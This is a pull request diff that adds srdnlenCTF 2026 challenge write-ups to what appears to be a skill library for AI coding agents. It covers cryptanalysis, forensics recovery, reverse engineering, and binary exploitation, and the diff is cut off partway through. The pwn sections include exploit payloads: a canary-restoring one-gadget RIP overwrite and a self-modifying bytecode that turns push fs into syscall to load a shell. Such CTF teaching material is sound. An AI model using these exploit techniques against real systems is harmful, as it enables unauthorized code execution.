### PR TITLE
Add srdnlenCTF 2026 techniques and fix skill spec compliance

### DIFF
--- a/ctf-crypto/SKILL.md
+++ b/ctf-crypto/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-crypto
-description: Cryptography attack techniques for CTF challenges. Use when attacking encryption, hashing, signatures, ZKP, PRNG, or mathematical crypto problems involving RSA, AES, ECC, lattices, LWE, CVP, number theory, Coppersmith, Pollard, Wiener, padding oracle, GCM, key derivation, or stream/block cipher weaknesses.
+description: Provides cryptography attack techniques for CTF challenges. Use when attacking encryption, hashing, signatures, ZKP, PRNG, or mathematical crypto problems involving RSA, AES, ECC, lattices, LWE, CVP, number theory, Coppersmith, Pollard, Wiener, padding oracle, GCM, key derivation, or stream/block cipher weaknesses.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-crypto/modern-ciphers.md
+++ b/ctf-crypto/modern-ciphers.md
@@ -8,6 +8,7 @@
 - [Non-Permutation S-box Collision Attack](#non-permutation-s-box-collision-attack)
 - [LCG Partial Output Recovery (0xFun 2026)](#lcg-partial-output-recovery-0xfun-2026)
 - [Weak Hash Functions / GF(2) Gaussian Elimination](#weak-hash-functions-gf2-gaussian-elimination)
+- [Ascon-like Reduced-Round Differential Cryptanalysis (srdnlenCTF 2026)](#ascon-like-reduced-round-differential-cryptanalysis-srdnlenctf-2026)
 
 ---
 
@@ -153,6 +154,58 @@ def decrypt_with_derived_key(s_bytes, wrapped_nonce, ciphertext, aes_nonce, tag,
 ```
 
 **Key insight:** When AES-GCM authentication fails (`ValueError: MAC check failed`), the derived key is wrong — usually means the upstream secret recovery was incorrect or endianness is swapped.
+
+---
+
+## Ascon-like Reduced-Round Differential Cryptanalysis (srdnlenCTF 2026)
+
+**Pattern (Lightweight):** 4-round Ascon-like permutation with reduced diffusion. Key-dependent biases in output-bit differentials allow key recovery via chosen input differences.
+
+**Attack:**
+1. Reproduce the permutation exactly (critical: post-S-box x4 assignment order matters)
+2. Invert the linear layer of x0 using a precomputed 64×64 GF(2) inverse matrix
+3. For each bit position i, query with `diff = (1<<i, 1<<i)` across multiple samples
+4. Measure empirical biases at output bits `j1 = (i+1) mod 64` and `j2 = (i+14) mod 64`
+5. Classify key bits `(k0[i], k1[i])` via centroid-based clustering with sign-pattern mask
+6. Verify candidate key in-session; refine low-margin bits with additional samples
+
+**GF(2) linear layer inversion:**
+```python
+def build_inverse(shifts=(19, 28)):
+    """Construct GF(2) inverse matrix for Ascon-like linear layer: x ^= rot(x,19) ^ rot(x,28)."""
+    # Build 64x64 matrix over GF(2)
+    M = [[0]*64 for _ in range(64)]
+    for out_bit in range(64):
+        M[out_bit][out_bit] = 1
+        for shift in shifts:
+            M[out_bit][(out_bit + shift) % 64] ^= 1
+    # Gaussian elimination to find inverse
+    aug = [row + [1 if i == j else 0 for j in range(64)] for i, row in enumerate(M)]
+    for col in range(64):
+        pivot = next(r for r in range(col, 64) if aug[r][col])
+        aug[col], aug[pivot] = aug[pivot], aug[col]
+        for r in range(64):
+            if r != col and aug[r][col]:
+                aug[r] = [a ^ b for a, b in zip(aug[r], aug[col])]
+    return [row[64:] for row in aug]
+```
+
+**Centroid clustering for key classification:**
+```python
+# For each bit position, measure bias at two output positions
+# 4 possible (k0[i], k1[i]) pairs → 4 centroid patterns
+# Uses sign-pattern mask CMASK=0x73 to account for bit-position-dependent behavior
+# Classify by minimum Euclidean distance in 2D bias space
+CMASK = 0x73
+for i in range(64):
+    bias_j1, bias_j2 = measure_biases(i, samples)
+    mask_bit = (CMASK >> (i % 8)) & 1
+    centroids = centroid_table[mask_bit]  # Precomputed per-position centroids
+    k0_bit, k1_bit = min(range(4), key=lambda c: euclidean_dist(
+        (bias_j1, bias_j2), centroids[c]))
+```
+
+**Key insight:** Reduced-round lightweight ciphers (Ascon, GIFT, etc.) have exploitable biases when the number of rounds is insufficient for full diffusion. The linear layer's inverse can be computed algebraically, and differential biases measured across chosen-plaintext queries reveal individual key bits. This is practical even with noisy measurements if you collect enough samples.
 
 ---
 

--- a/ctf-crypto/zkp-and-advanced.md
+++ b/ctf-crypto/zkp-and-advanced.md
@@ -8,6 +8,9 @@
 - [Bigram/Trigram Substitution -> Constraint Solving (LACTF 2026)](#bigramtrigram-substitution-constraint-solving-lactf-2026)
 - [Shamir Secret Sharing with Deterministic Coefficients (LACTF 2026)](#shamir-secret-sharing-with-deterministic-coefficients-lactf-2026)
 - [Race Condition in Crypto-Protected Endpoints (LACTF 2026)](#race-condition-in-crypto-protected-endpoints-lactf-2026)
+- [Garbled Circuits: AES Key Recovery via Metadata Leakage (srdnlenCTF 2026)](#garbled-circuits-aes-key-recovery-via-metadata-leakage-srdnlenctf-2026)
+- [Post-Quantum Signature Fault Injection: MAYO (srdnlenCTF 2026)](#post-quantum-signature-fault-injection-mayo-srdnlenctf-2026)
+- [Lattice-Based Threshold Signature Attack: FROST (srdnlenCTF 2026)](#lattice-based-threshold-signature-attack-frost-srdnlenctf-2026)
 
 ---
 
@@ -186,3 +189,119 @@ processes = [Process(target=make_request, args=(barrier, modify_sig(i))) for i i
 ```
 
 **Key insight:** TOCTOU in `check-then-act` patterns. Look for read-modify-write without atomicity/locking.
+
+---
+
+## Garbled Circuits: AES Key Recovery via Metadata Leakage (srdnlenCTF 2026)
+
+**Pattern (FHAES):** Service evaluates AES via garbled circuits with a fixed per-connection key. Exploit garbling metadata rather than AES cryptanalysis.
+
+**Attack:**
+1. Construct a custom circuit with one attacker-controlled AND gate that leaks the global Free-XOR offset delta
+2. Use delta to locally evaluate the key-schedule section (first 1360 AND gates) as the evaluator
+3. For each of the first 16 key-schedule S-box calls, brute-force the input byte by re-garbling the S-box chunk and comparing observed AND tables
+4. Reconstruct key words from S-box outputs and recover the full 128-bit key through algebraic manipulation of the AES-128 schedule recurrence
+
+```python
+def garble_and(A, B, D, and_idx):
+    """Reproduce garbling with proper parity handling."""
+    r = B & 1
+    alpha = A & 1
+    beta = B & 1
+    # Computes gate0, gate1, z output via hash-based approach
+    return gate0, gate1, z
+
+def evaluator_and(A, B, gate0, gate1, and_idx):
+    """Evaluate AND gate using hash-based approach."""
+    hashA = h_wire(A, and_idx)
+    hashB = h_wire(B, and_idx)
+    L = hashA if (A & 1) == 0 else (hashA ^ gate0)
+    R = hashB if (B & 1) == 0 else (hashB ^ gate1)
+    return L ^ R ^ (A * (B & 1))
+```
+
+**Key insight:** Garbled circuits that use free XOR optimization with fixed keys across sessions leak key material through the AND gate truth tables. Each S-box has a small enough input space (256 values) to brute-force when you know delta. This extends the LACTF technique from "recovering delta" to "recovering the entire AES key."
+
+---
+
+## Post-Quantum Signature Fault Injection: MAYO (srdnlenCTF 2026)
+
+**Pattern (Faulty Mayo):** One-byte fault injection window in `mayo_sign_signature` before final `s = v + O*x` construction. Controlled bit flips across 64 signature queries recover the secret matrix O row by row.
+
+**Attack:**
+1. Reverse binary to map fault offsets to `mayo_sign_signature` instructions
+2. For each of 64 rows of secret matrix O, use faulted signatures to extract linear equations over GF(16)
+3. Solve 17-variable linear systems over GF(16) for each row using Gaussian elimination
+4. Rebuild equivalent signer using recovered O and public seed from compressed public key
+5. Forge valid signature for challenge message
+
+**GF(16) Gaussian elimination:**
+```python
+# Precompute multiplication and inverse tables for GF(16)
+# GF(16) = GF(2)[x] / (x^4 + x + 1), elements 0-15
+INV = [0] * 16  # multiplicative inverses
+MUL = [[0]*16 for _ in range(16)]  # multiplication table
+
+def solve_linear_gf16(equations, nvars=17):
+    """Gaussian elimination over GF(16)."""
+    A = [x[:] + [y] for x, y in equations]
+    m, row = len(A), 0
+    for col in range(nvars):
+        piv = next((r for r in range(row, m) if A[r][col] != 0), None)
+        if piv is None: continue
+        A[row], A[piv] = A[piv], A[row]
+        invp = INV[A[row][col]]
+        A[row] = [MUL[invp][v] for v in A[row]]
+        for r in range(m):
+            if r != row and A[r][col] != 0:
+                f = A[r][col]
+                A[r] = [A[r][c] ^ MUL[f][A[row][c]] for c in range(nvars + 1)]
+        row += 1
+    return [A[i][nvars] for i in range(nvars)]
+```
+
+**Key insight:** Post-quantum signature schemes like MAYO can be broken with fault injection if you can cause controlled bit flips during signing. Each fault creates a linear equation over GF(16), and 17+ equations per row suffice to recover the secret. This is analogous to DFA on classical schemes but over extension fields.
+
+---
+
+## Lattice-Based Threshold Signature Attack: FROST (srdnlenCTF 2026)
+
+**Pattern (Threshold):** Preprocessing queue capacity allows collecting many signatures. Fixed challenge construction enables solving 1D noisy linear equations per coefficient.
+
+**Attack:**
+1. Exploit queue-depth cap (≤8 active) rather than total-usage cap by alternating menu options
+2. Force fixed challenge `c` by choosing commitment `w₀` each query to zero aggregate commitment before high-bit extraction
+3. With fixed `c`, each coefficient becomes: `z = λ·u + noise (mod q)`
+4. Select multiple signer subsets to obtain different Lagrange coefficient scales (small/mid/huge) for each target signer
+5. Solve via interval intersection and maximum-likelihood selection
+6. Recover 7 signer shares; combine with own share; reconstruct master secret via Lagrange interpolation
+
+**Interval intersection algorithm:**
+```python
+from math import ceil, floor
+
+def intersect_intervals(intervals, lam, z, q, B):
+    """Refine candidate intervals using one (λ, z) observation with noise bound B."""
+    out = []
+    for lo, hi in intervals:
+        if lam > 0:
+            kmin = ceil((lam * lo - z - B) / q)
+            kmax = floor((lam * hi - z + B) / q)
+            for k in range(kmin, kmax + 1):
+                a = (z + q * k - B) / lam
+                b = (z + q * k + B) / lam
+                lo2, hi2 = max(lo, a), min(hi, b)
+                if lo2 <= hi2:
+                    out.append((lo2, hi2))
+    # Merge overlapping intervals
+    out.sort()
+    merged = [out[0]] if out else []
+    for lo, hi in out[1:]:
+        if lo <= merged[-1][1]:
+            merged[-1] = (merged[-1][0], max(merged[-1][1], hi))
+        else:
+            merged.append((lo, hi))
+    return merged
+```
+
+**Key insight:** Threshold signature schemes can leak individual shares when the challenge value is controlled. By querying with different signer subsets, you get different Lagrange coefficient scales for the same unknown share, allowing iterative interval refinement. With enough observations, the interval converges to a unique value.

--- a/ctf-forensics/SKILL.md
+++ b/ctf-forensics/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-forensics
-description: Digital forensics and signal analysis for CTF challenges. Use when analyzing disk images, memory dumps, event logs, network captures, cryptocurrency transactions, steganography, PDF analysis, Windows registry, Volatility, PCAP, Docker images, coredumps, side-channel power traces, DTMF audio spectrograms, packet timing analysis, or recovering deleted files and credentials.
+description: Provides digital forensics and signal analysis techniques for CTF challenges. Use when analyzing disk images, memory dumps, event logs, network captures, cryptocurrency transactions, steganography, PDF analysis, Windows registry, Volatility, PCAP, Docker images, coredumps, side-channel power traces, DTMF audio spectrograms, packet timing analysis, or recovering deleted files and credentials.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-forensics/disk-and-memory.md
+++ b/ctf-forensics/disk-and-memory.md
@@ -14,6 +14,9 @@
 - [Memory Dump String Carving (Pragyan 2026)](#memory-dump-string-carving-pragyan-2026)
 - [Memory Dump Malware Extraction + XOR (VuwCTF 2025)](#memory-dump-malware-extraction-xor-vuwctf-2025)
 - [Linux Ransomware Memory-Key Recovery (MetaCTF 2026)](#linux-ransomware-memory-key-recovery-metactf-2026)
+- [WordPerfect Macro XOR Extraction (srdnlenCTF 2026)](#wordperfect-macro-xor-extraction-srdnlenctf-2026)
+- [Minidump ISO 9660 Recovery + XOR Key (srdnlenCTF 2026)](#minidump-iso-9660-recovery--xor-key-srdnlenctf-2026)
+- [APFS Snapshot Historical File Recovery (srdnlenCTF 2026)](#apfs-snapshot-historical-file-recovery-srdnlenctf-2026)
 - [PowerShell Ransomware Analysis](#powershell-ransomware-analysis)
 
 ---
@@ -297,6 +300,139 @@ pdftotext recovered_full/**/*.pdf - 2>/dev/null | rg '[A-Za-z]+CTF\\{'
 - Don’t trust a partial/stale extraction tree; re-extract zip cleanly.
 - In OFB ransomware, magic-byte validation is a fast key oracle.
 - A plausible `CTF{...}` in metadata can be a decoy; confirm with corpus-wide consistency.
+
+---
+
+## WordPerfect Macro XOR Extraction (srdnlenCTF 2026)
+
+**Pattern (Trilogy of Death Vol I: Corel):** Corel Linux disk image containing WordPerfect macro file (fc.wcm) with XOR-encrypted byte arrays.
+
+**Key insight:** WordPerfect macro files (`.wcm`) can contain executable macros with embedded encrypted data. The XOR formula `(bb + kb) - 2*(bb & kb)` is mathematically equivalent to bitwise XOR.
+
+**Brute-force 4-byte XOR key under charset constraints:**
+```python
+import string
+
+docbody = [206, 56, 8, 128, 209, 47, 2, 149, ...]  # encrypted bytes from macro
+allowed = set(map(ord, string.ascii_lowercase + string.digits + "_{}"))
+
+# Find valid key bytes independently for each position mod 4
+cands = []
+for j in range(4):
+    good = []
+    for k in range(256):
+        if all((docbody[i] ^ k) in allowed for i in range(j, len(docbody), 4)):
+            good.append(k)
+    cands.append(good)
+
+# Try all combinations (usually very few candidates per position)
+for k0 in cands[0]:
+    for k1 in cands[1]:
+        for k2 in cands[2]:
+            for k3 in cands[3]:
+                key = [k0, k1, k2, k3]
+                pt = ''.join(chr(c ^ key[i % 4]) for i, c in enumerate(docbody))
+                if pt.startswith("srd") and pt.endswith("}"):
+                    print(pt)
+```
+
+**Lesson:** Legacy document formats (WordPerfect, Lotus 1-2-3) can embed executable macros with obfuscated data. When you know the flag charset, brute-forcing a short XOR key is trivial by filtering each key byte independently.
+
+---
+
+## Minidump ISO 9660 Recovery + XOR Key (srdnlenCTF 2026)
+
+**Pattern (Trilogy of Death Vol II: The Legendary Armory):** Two relics in volatile memory (minidump) must be XORed; ISO 9660 directory entries in memory fragments point to hidden data.
+
+**Technique:**
+1. Search minidump for ISO 9660 directory entry signatures
+2. Parse directory entries to locate target file offset and size
+3. Decrypt file using recovered XOR key (e.g., 8-byte repeating key)
+4. Parse resulting data as ZIP without central directory (local headers only)
+
+**ZIP local header parsing without central directory:**
+```python
+import struct, zlib
+
+pos = 0
+files = {}
+while True:
+    off = dec.find(b"PK\x03\x04", pos)
+    if off < 0:
+        break
+    (ver, flag, method, _, _, crc, csize, usize, nlen, xlen) = struct.unpack_from(
+        "<HHHHHIIIHH", dec, off + 4)
+    name = dec[off + 30:off + 30 + nlen].decode()
+    data_off = off + 30 + nlen + xlen
+    comp = dec[data_off:data_off + csize]
+    if method == 8:  # Deflate
+        raw = zlib.decompress(comp, -15)
+    else:
+        raw = comp
+    files[name] = raw
+    pos = data_off + csize
+```
+
+**Key insight:** When ZIP central directory is missing/corrupt, iterate local file headers (`PK\x03\x04`) directly. Each local header contains enough metadata (compression method, sizes, filename) to extract files independently.
+
+---
+
+## APFS Snapshot Historical File Recovery (srdnlenCTF 2026)
+
+**Pattern (Trilogy of Death Vol III: The Poisoned Apple):** APFS volume maintains historical snapshots; recovering earlier state of a key file reveals authentic value before poisoning.
+
+**Technique:**
+1. Extract APFS partition from DMG (locate by sector offset)
+2. Search for APFS volume superblocks (magic `APSB`) across all snapshots, noting transaction IDs (XIDs)
+3. Use `icat` (Sleuth Kit with APFS support) to read specific inodes across different snapshot XIDs
+4. Compare file content across XID boundaries to identify when poisoning occurred
+5. Use pre-poisoning value for decryption
+
+**Finding APFS volume superblocks across snapshots:**
+```python
+import struct
+
+with open("apfs_partition.img", "rb") as f:
+    mm = f.read()
+
+snaps = []
+pos = 0
+while True:
+    idx = mm.find(b"APSB", pos)
+    if idx < 0:
+        break
+    # XID is at offset -16 from magic (in block header)
+    hdr_start = idx - 32
+    xid = struct.unpack_from("<Q", mm, hdr_start + 16)[0]
+    blk = hdr_start // 4096
+    snaps.append((xid, blk))
+    pos = idx + 1
+
+# Read target inode across snapshots
+import subprocess
+for xid, blk in sorted(set(snaps)):
+    try:
+        out = subprocess.check_output(
+            ["icat", "-f", "apfs", "-P", "apfs", "-B", str(blk),
+             "apfs_partition.img", "449414"])  # target inode number
+        print(f"XID {xid}: {out[:64]}...")
+    except:
+        pass
+```
+
+**Decryption with recovered authentic key:**
+```python
+import hashlib
+from Cryptodome.Cipher import AES
+
+# Pre-poisoning key value (found in earlier snapshot)
+authentic_key_hex = "39f520679fd68654500f9cd44e8caed2bc897a3227dc297c4520336de2a59dd7"
+key = hashlib.pbkdf2_hmac('sha256', bytes.fromhex(authentic_key_hex), salt, iterations)
+cipher = AES.new(key, AES.MODE_CBC, iv)
+plaintext = cipher.decrypt(encrypted_flag)
+```
+
+**Key insight:** APFS (and other copy-on-write filesystems like ZFS/Btrfs) preserve historical file states in snapshots. When a challenge involves "poisoned" or "tampered" data, always check for older snapshots containing the original values. Use `icat` with different block offsets to read the same inode across different transaction IDs.
 
 ---
 

--- a/ctf-malware/SKILL.md
+++ b/ctf-malware/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-malware
-description: Malware analysis and network traffic techniques for CTF challenges. Use when analyzing obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, PE/.NET binaries, RC4/AES encrypted communications, or extracting malware configurations and indicators of compromise.
+description: Provides malware analysis and network traffic techniques for CTF challenges. Use when analyzing obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, PE/.NET binaries, RC4/AES encrypted communications, or extracting malware configurations and indicators of compromise.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-misc/SKILL.md
+++ b/ctf-misc/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-misc
-description: Miscellaneous CTF challenge techniques. Use for encoding puzzles, RF/SDR signal processing, Python/bash jails, DNS exploitation, unicode steganography, floating-point tricks, QR codes, audio challenges, Z3 constraint solving, Kubernetes RBAC, WASM game patching, esoteric languages, game theory, commitment schemes, combinatorial games, or challenges that don't fit other categories.
+description: Provides miscellaneous CTF challenge techniques. Use for encoding puzzles, RF/SDR signal processing, Python/bash jails, DNS exploitation, unicode steganography, floating-point tricks, QR codes, audio challenges, Z3 constraint solving, Kubernetes RBAC, WASM game patching, esoteric languages, game theory, commitment schemes, combinatorial games, or challenges that don't fit other categories.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch Skill

--- a/ctf-osint/SKILL.md
+++ b/ctf-osint/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-osint
-description: Open Source Intelligence techniques for CTF challenges. Use when gathering information from public sources, social media, geolocation, DNS records, username enumeration, reverse image search, Google dorking, Wayback Machine, Tor relays, FEC filings, or identifying unknown data like hashes and coordinates.
+description: Provides open source intelligence techniques for CTF challenges. Use when gathering information from public sources, social media, geolocation, DNS records, username enumeration, reverse image search, Google dorking, Wayback Machine, Tor relays, FEC filings, or identifying unknown data like hashes and coordinates.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for OSINT lookups.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-pwn/SKILL.md
+++ b/ctf-pwn/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-pwn
-description: Binary exploitation (pwn) techniques for CTF challenges. Use when exploiting buffer overflows, format strings, heap vulnerabilities, race conditions, kernel bugs, ROP chains, ret2libc, shellcode, GOT overwrite, use-after-free, seccomp bypass, FSOP, stack pivot, or sandbox escape.
+description: Provides binary exploitation (pwn) techniques for CTF challenges. Use when exploiting buffer overflows, format strings, heap vulnerabilities, race conditions, kernel bugs, ROP chains, ret2libc, shellcode, GOT overwrite, use-after-free, seccomp bypass, FSOP, stack pivot, or sandbox escape.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-pwn/advanced.md
+++ b/ctf-pwn/advanced.md
@@ -32,6 +32,9 @@
 - [VM GC-Triggered UAF — Slab Reuse (EHAX 2026)](#vm-gc-triggered-uaf-slab-reuse-ehax-2026)
 - [Path Traversal Sanitizer Bypass](#path-traversal-sanitizer-bypass)
 - [FSOP + Seccomp Bypass via openat/mmap/write (EHAX 2026)](#fsop--seccomp-bypass-via-openatmmapwrite-ehax-2026)
+- [Stack Variable Overlap / Carry Corruption OOB (srdnlenCTF 2026)](#stack-variable-overlap--carry-corruption-oob-srdnlenctf-2026)
+- [1-Byte Overflow via 8-bit Loop Counter (srdnlenCTF 2026)](#1-byte-overflow-via-8-bit-loop-counter-srdnlenctf-2026)
+- [Bytecode Validator Bypass via Self-Modification (srdnlenCTF 2026)](#bytecode-validator-bypass-via-self-modification-srdnlenctf-2026)
 - [Kernel Exploitation](#kernel-exploitation)
 
 ---
@@ -755,6 +758,91 @@ rop.raw(libc.sym.write)
 | `read` | `readv` | 19 |
 | `write` | `writev` | 20 |
 | `write` | `sendfile` | 40 |
+
+---
+
+## Stack Variable Overlap / Carry Corruption OOB (srdnlenCTF 2026)
+
+**Pattern (common_offset):** Stack variables share storage due to compiler layout. Carry from arithmetic on one variable corrupts an adjacent variable, enabling OOB access.
+
+**Vulnerability:** `index` (byte at `[rsp+0x49]`) and `offset` (word at `[rsp+0x48]`) share storage. Incrementing `offset` by 255 causes a carry that corrupts `index` from 3 to 4, producing out-of-bounds table access.
+
+**Exploit chain:**
+1. Set index=0, increment offset by 1 to establish baseline
+2. Set index=3, increment offset by 255 → carry corrupts index to 4
+3. OOB access on table retrieves saved RIP from stack frame
+4. Overwrite RIP to trigger `read_stdin` again, landing on stack gadget
+5. Two-stage ROP: leak `puts@GOT`, compute libc base, then `setcontext` for code execution
+
+**Key insight:** When variables of different sizes are packed adjacent on the stack (e.g., byte immediately after word), arithmetic overflow on the smaller-address variable carries into the larger-address variable. This is subtle in disassembly — look for overlapping `[rsp+N]` accesses with different operand sizes.
+
+**Detection:** In disassembly, check if two named variables share partially overlapping stack offsets. For example, a `word` at `rsp+0x48` and a `byte` at `rsp+0x49` — the high byte of the word IS the byte variable.
+
+---
+
+## 1-Byte Overflow via 8-bit Loop Counter (srdnlenCTF 2026)
+
+**Pattern (Echo):** Custom `read_stdin()` uses 8-bit loop counter that wraps around, writing 65 bytes to a 64-byte buffer, overflowing into an adjacent size variable.
+
+**Progressive leak technique:**
+1. Trigger 1-byte overflow to increase buffer size from 0x40 to 0x48
+2. With enlarged buffer, read further on stack — leak canary and saved rbp
+3. Increase size to 0x77 to leak main's libc return address from stack
+4. Compute libc base from leaked return address offset
+5. Craft final payload: restore canary, set fake rbp, overwrite RIP with one-gadget
+
+**One-gadget constraint setup:**
+```python
+from pwn import *
+
+# Stack layout: buffer[rbp-0x50], size[rbp-0x10], canary[rbp-0x08], rbp, ret
+# One-gadget needs NULL at [rbp-0x78] and [rbp-0x60]
+buf_addr = leaked_rbp - 0x50  # known from leak
+fake_rbp = buf_addr + 0x78
+
+payload = b"\x00" * 8          # [fake_rbp - 0x78] = NULL (constraint)
+payload += b"A" * 16
+payload += b"\x00" * 8          # [fake_rbp - 0x60] = NULL (constraint)
+payload = payload.ljust(64, b"A")
+payload += p64(0x48)            # preserve enlarged size
+payload += p64(canary)          # restore canary
+payload += p64(fake_rbp)        # fake rbp satisfying constraints
+payload += p64(one_gadget)      # libc one-gadget
+```
+
+**Key insight:** 8-bit counters in read loops cause off-by-one when the buffer size equals the counter's range (64 → wraps after 64, writes byte 65). The 1-byte overflow into a size field creates a progressive information disclosure primitive: each round leaks more stack data, enabling a full exploit chain from a single-byte overflow.
+
+---
+
+## Bytecode Validator Bypass via Self-Modification (srdnlenCTF 2026)
+
+**Pattern (Registered Stack):** Bytecode validator only checks initial bytes; runtime self-modification converts validated instructions into forbidden ones (e.g., `push fs` → `syscall`).
+
+**Key technique:** `push fs` encodes as `0f a0`, and `syscall` as `0f 05`. The validator accepts `push fs`, but at runtime a preceding `push rbx` overwrites the `a0` byte with `05` on the stack, turning it into `syscall`.
+
+**Exploit structure:**
+1. Use `pop` instructions to adjust rsp to a predictable memory bucket (~1/16 probability due to ASLR)
+2. Seed specific stack values for `pop sp` instruction (pivots to controlled location)
+3. Place `syscall` gadget disguised as `push fs` with self-modifying byte mutation
+4. Use `read(0, stage2_buf, size)` syscall to load stage 2
+5. Stage 2 contains interactive shell code
+
+```python
+code = []
+code += [0x59] * 30              # pop rcx x30 → rsp += 0xf0
+code += [0x66, 0x5c]             # pop sp → pivot to seeded value
+code += [0x50] * 17              # push rax x17 (adjust stack)
+code += [0x66, 0x50]             # push ax
+code += [0x66, 0x54, 0x66, 0x5b] # push sp; pop bx (rbx = count for read)
+code += [0x50] * 66              # push rax x66
+code += [0x66, 0x59]             # pop cx
+code += [0x53]                   # push rbx → overwrites next byte!
+# Following bytes: 0x54 0x5e 0x53 0x5a 0x54 0x0f 0xa0
+# After push rbx mutates 0xa0 → 0x05: becomes syscall
+code += [0x54, 0x5e, 0x53, 0x5a, 0x54, 0x0f, 0xa0]
+```
+
+**Key insight:** Bytecode validators that only check the instruction stream statically are vulnerable to self-modification at runtime. Look for instruction pairs where one byte difference changes the instruction's semantics (e.g., `0f a0` → `0f 05`). Use preceding instructions to write the mutation byte onto the stack/code region.
 
 ---
 

--- a/ctf-reverse/SKILL.md
+++ b/ctf-reverse/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-reverse
-description: Reverse engineering techniques for CTF challenges. Use when analyzing binaries, game clients, obfuscated code, esoteric languages, custom VMs, anti-debugging, WASM, .NET, APK, Python bytecode, Ghidra, GDB, radare2, or extracting flags from compiled executables.
+description: Provides reverse engineering techniques for CTF challenges. Use when analyzing binaries, game clients, obfuscated code, esoteric languages, custom VMs, anti-debugging, WASM, .NET, APK, Python bytecode, Ghidra, GDB, radare2, or extracting flags from compiled executables.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-reverse/languages.md
+++ b/ctf-reverse/languages.md
@@ -19,6 +19,7 @@
 - [Roblox Place File Analysis](#roblox-place-file-analysis)
 - [Godot Game Asset Extraction](#godot-game-asset-extraction)
 - [Rust serde_json Schema Recovery](#rust-serde_json-schema-recovery)
+- [Verilog/Hardware Reverse Engineering (srdnlenCTF 2026)](#veriloghardware-reverse-engineering-srdnlenctf-2026)
 
 ---
 
@@ -306,6 +307,40 @@ Decode chunk payloads, walk PROP entries for `Source` field, dump `Script.Source
 ```
 
 **Key insight:** Flag is the concatenation of JSON keys in schema order. Reading field names in order reveals the flag.
+
+---
+
+## Verilog/Hardware Reverse Engineering (srdnlenCTF 2026)
+
+**Pattern (Rev Juice):** Verilog HDL source for a vending machine with hidden product unlocked by specific coin insertion and selection sequence.
+
+**Approach:**
+1. Analyze Verilog modules to understand state machine and history tracking
+2. Identify hidden conditions (e.g., product 8 enabled only when `COINS_HISTORY` array has specific values at specific taps)
+3. Build timing model for each action type (how many clock cycles each operation takes)
+4. Work backward from required history values to construct the correct input sequence
+
+**Timing model construction:**
+```python
+# Map each action to its cycle count (determined from Verilog state machines)
+TIMING = {
+    "insert_coin": 3,       # 3 cycles per coin insertion
+    "select_success": 7,    # 7 cycles for successful product selection
+    "select_fail": 5,       # 5 cycles for failed selection attempt
+    "cancel_with_coins": 4, # 4 cycles for cancel when coins > 0
+    "cancel_at_zero": 2,    # 2 cycles for cancel when coins = 0
+}
+
+# COINS_HISTORY is a shift register updated each cycle
+# History tap requirements (from Verilog conditions):
+# H[0]=1, H[7]=4, H[28]=H[33]=H[38]=6
+# H[63]=H[73]=2, H[80]=9
+# (H[19]+H[21]+H[56]+H[69]) mod 32 = 0
+```
+
+**Key insight:** Hardware challenges require understanding the exact timing model — each operation takes a specific number of clock cycles, and shift registers record history at fixed tap positions. Work backward from the required tap values to determine what action must have occurred at each cycle. The solution is often a specific sequence notation (e.g., `I9C_SP6_CNL_I2C_SP2_I6C_SP6_SP6_SP5_CNL_I4C_SP1`).
+
+**Detection:** Look for `.v` or `.sv` (Verilog/SystemVerilog) files, `always @(posedge clk)` blocks, shift register patterns, and state machine `case` statements with hidden conditions gated on history values.
 
 ---
 

--- a/ctf-reverse/patterns.md
+++ b/ctf-reverse/patterns.md
@@ -52,6 +52,9 @@
 - [Malware Anti-Analysis Bypass via Patching](#malware-anti-analysis-bypass-via-patching)
 - [Multi-Stage Shellcode Loaders](#multi-stage-shellcode-loaders)
 - [Embedded ZIP + XOR License Decryption (MetaCTF 2026)](#embedded-zip--xor-license-decryption-metactf-2026)
+- [Windows PE XOR Bitmap Extraction + OCR (srdnlenCTF 2026)](#windows-pe-xor-bitmap-extraction--ocr-srdnlenctf-2026)
+- [Two-Stage Loader: RC4 Gate + VM Constraints (srdnlenCTF 2026)](#two-stage-loader-rc4-gate--vm-constraints-srdnlenctf-2026)
+- [GBA ROM VM Hash Inversion via Meet-in-the-Middle (srdnlenCTF 2026)](#gba-rom-vm-hash-inversion-via-meet-in-the-middle-srdnlenctf-2026)
 - [Timing Side-Channel Attack](#timing-side-channel-attack)
 
 ---
@@ -693,6 +696,143 @@ int sigaction(int signum, const struct sigaction *act, ...) {
 values = [0x6174654d, 0x7b465443, ...]  # From disassembly
 flag = b''.join(v.to_bytes(4, 'little') for v in values)
 ```
+
+---
+
+## Windows PE XOR Bitmap Extraction + OCR (srdnlenCTF 2026)
+
+**Pattern (Artistic Warmup):** Binary renders input text, compares rendered bitmap against expected pixel data stored XOR'd with constant in `.rdata`. No need to compute — extract expected pixels directly.
+
